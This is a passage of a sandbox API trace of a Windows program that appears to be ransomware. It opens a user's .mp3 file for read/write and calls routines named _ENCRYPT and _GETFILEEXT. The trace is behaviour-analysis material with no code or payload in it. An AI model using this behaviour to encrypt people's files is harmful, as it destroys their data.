[0038.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0038.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8896a0 [0038.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8896a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0038.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.118] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0038.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8896a0 [0038.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8896a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0038.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.119] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0038.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0038.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0038.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3a) returned 0x7ab260 [0038.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3", cchWideChar=58, lpMultiByteStr=0x7ab260, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3", lpUsedDefaultChar=0x0) returned 58 [0038.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.120] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\__hn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0038.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0038.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0038.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=58, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0038.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x74) returned 0x7800d0 [0038.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=58, lpWideCharStr=0x7800d0, cchWideChar=58 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3") returned 58 [0038.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0038.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0038.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0038.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0038.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0038.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.121] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0038.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.122] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.122] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.123] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0038.123] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.123] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.123] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.124] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.124] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0038.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0038.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.124] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.124] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0038.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.124] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0038.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.124] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.124] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.124] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.124] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ac52da0, ftCreationTime.dwHighDateTime=0x1d5c0fa, ftLastAccessTime.dwLowDateTime=0x2339e1c0, ftLastAccessTime.dwHighDateTime=0x1d5be98, ftLastWriteTime.dwLowDateTime=0x2339e1c0, ftLastWriteTime.dwHighDateTime=0x1d5be98, nFileSizeHigh=0x0, nFileSizeLow=0x16f92, dwReserved0=0x0, dwReserved1=0x777648, cFileName="__Hn.mp3", cAlternateFileName="")) returned 0x7c20c0 [0038.125] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.125] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.125] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ac52da0, ftCreationTime.dwHighDateTime=0x1d5c0fa, ftLastAccessTime.dwLowDateTime=0x2339e1c0, ftLastAccessTime.dwHighDateTime=0x1d5be98, ftLastWriteTime.dwLowDateTime=0x2339e1c0, ftLastWriteTime.dwHighDateTime=0x1d5be98, nFileSizeHigh=0x0, nFileSizeLow=0x16f92, dwReserved0=0x0, dwReserved1=0x777648, cFileName="__Hn.mp3", cAlternateFileName="")) returned 0x7c20c0 [0038.125] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0038.125] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.125] 